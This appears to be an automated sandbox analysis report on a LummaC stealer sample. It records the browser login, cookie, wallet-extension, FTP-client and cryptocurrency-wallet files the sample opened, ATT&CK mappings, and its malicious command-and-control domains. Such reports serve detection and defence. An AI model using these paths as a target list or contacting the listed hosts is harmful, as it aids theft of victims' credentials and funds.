                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\formhistory.sqliteJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\logins.jsonJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.dbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                Tries to harvest and steal ftp login credentials
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                Tries to steal Crypto Currency Wallets
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EEGWXUHVUGJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: C:\Users\user\Desktop\YuQuLoader.exeDirectory queried: C:\Users\user\Documents\EOWRVPQCCSJump to behavior
                Source: Yara matchFile source: 00000002.00000003.1557228002.0000000001640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1557692943.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1557429661.00000000015DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1557429661.0000000001640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1557228002.00000000015D9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1558849037.0000000001644000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000003.1557692943.0000000001640000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: YuQuLoader.exe PID: 8668, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Yara detected LummaC Stealer
                Source: Yara matchFile source: 2.2.YuQuLoader.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.YuQuLoader.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.2617683051.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1444774555.0000000002CC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation                		1
                DLL Side-Loading                		211
                Process Injection                		22
                Virtualization/Sandbox Evasion                		2
                OS Credential Dumping                		1
                System Time Discovery                		Remote Services1
                Screen Capture                		21
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                DLL Side-Loading                		211
                Process Injection                		LSASS Memory251
                Security Software Discovery                		Remote Desktop Protocol1
                Archive Collected Data                		1
                Ingress Tool Transfer                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
                Deobfuscate/Decode Files or Information                		Security Account Manager22
                Virtualization/Sandbox Evasion                		SMB/Windows Admin Shares41
                Data from Local System                		3
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook4
                Obfuscated Files or Information                		NTDS1
                Process Discovery                		Distributed Component Object Model3
                Clipboard Data                		14
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script2
                Software Packing                		LSA Secrets1
                Application Window Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                DLL Side-Loading                		Cached Domain Credentials11
                File and Directory Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync33
                System Information Discovery                		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                YuQuLoader.exe41%VirustotalBrowse
                YuQuLoader.exe39%ReversingLabsWin32.Exploit.LummaC

                Dropped Files

                No Antivirus matches

                Unpacked PE Files

                No Antivirus matches

                Domains

                No Antivirus matches

                URLs

                SourceDetectionScannerLabelLink
                https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=3d938ea1e907c113ce_1465081059650%Avira URL Cloudsafe
                https://mrodularmall.top/aJ100%Avira URL Cloudmalware
                https://mrodularmall.top:443/aNzSMicrosoft100%Avira URL Cloudmalware
                https://mrodularmall.top/aNzS100%Avira URL Cloudmalware
                https://mrodularmall.top/b100%Avira URL Cloudmalware
                https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg0%Avira URL Cloudsafe
                https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.0%Avira URL Cloudsafe
                https://mrodularmall.top/100%Avira URL Cloudmalware
                https://mrodularmall.top/aNzS33100%Avira URL Cloudmalware
                https://mrodularmall.top/aNzSrmal100%Avira URL Cloudmalware
                https://mrodularmall.top/aR100%Avira URL Cloudmalware

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                t.me
                		149.154.167.99
                		truefalse
                  		high
                  featureccus.shop
                  		104.21.93.43
                  		truefalse
                    		high
                    mrodularmall.top
                    		104.21.112.1
                    		truetrue
                      		unknown
                      astralconnec.icu
                      		unknown
                      		unknownfalse
                        		high

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        https://mrodularmall.top/aNzSfalse
                        • Avira URL Cloud: malware
                        		unknown
                        https://t.me/asdawfqfalse
                          		high

                          URLs from Memory and Binaries

                          NameSourceMaliciousAntivirus DetectionReputation
                          https://t.me/YuQuLoader.exe, 00000002.00000003.1400589271.00000000015CB000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            https://duckduckgo.com/ac/?q=YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://web.telegram.orgYuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                		high
                                https://mrodularmall.top:443/aNzSMicrosoftYuQuLoader.exe, 00000002.00000003.1652149177.0000000003CB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                		unknown
                                https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYiYuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  		high
                                  https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.YuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  		unknown
                                  https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.rootca1.amazontrust.com/rootca1.crl0YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                      		high
                                      https://ac.ecosia.org?q=YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high
                                        http://upx.sf.netAmcache.hve.5.drfalse
                                          		high
                                          https://web.telegram.orgPersistent-AuthWWW-AuthenticateVarystel_ssid=3d938ea1e907c113ce_146508105965YuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: safe
                                          		unknown
                                          https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            http://ocsp.rootca1.amazontrust.com0:YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                              		high
                                              https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&ctaYuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                		high
                                                https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brYuQuLoader.exe, 00000002.00000003.1515206380.00000000040DC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  https://t.me/asdawfqyV-YuQuLoader.exe, 00000002.00000002.2618072393.0000000001598000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    https://www.google.com/images/branding/product/ico/googleg_alldp.icoYuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      https://www.ecosia.org/newtab/v20YuQuLoader.exe, 00000002.00000003.1453565184.0000000003CC8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        		high
                                                        https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpgYuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        https://mrodularmall.top/aJYuQuLoader.exe, 00000002.00000003.1615811918.0000000001668000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://mrodularmall.top/bYuQuLoader.exe, 00000002.00000002.2618503724.0000000001664000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681284940.0000000001655000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681714373.0000000001663000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        		unknown
                                                        https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpgYuQuLoader.exe, 00000002.00000003.1515462073.000000000167D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          https://web.telegram.orgX-Frame-OptionsALLOW-FROMYuQuLoader.exe, 00000002.00000003.1400529592.00000000015DB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://x1.c.lencr.org/0YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              		high
                                                              http://x1.i.lencr.org/0YuQuLoader.exe, 00000002.00000003.1514288113.0000000003EBD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://mrodularmall.top/aNzS33YuQuLoader.exe, 00000002.00000002.2618436068.0000000001646000.00000004.00000020.00020000.00000000.sdmp, YuQuLoader.exe, 00000002.00000003.1681464391.0000000001646000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                • Avira URL Cloud: malware
                                                                		unknown
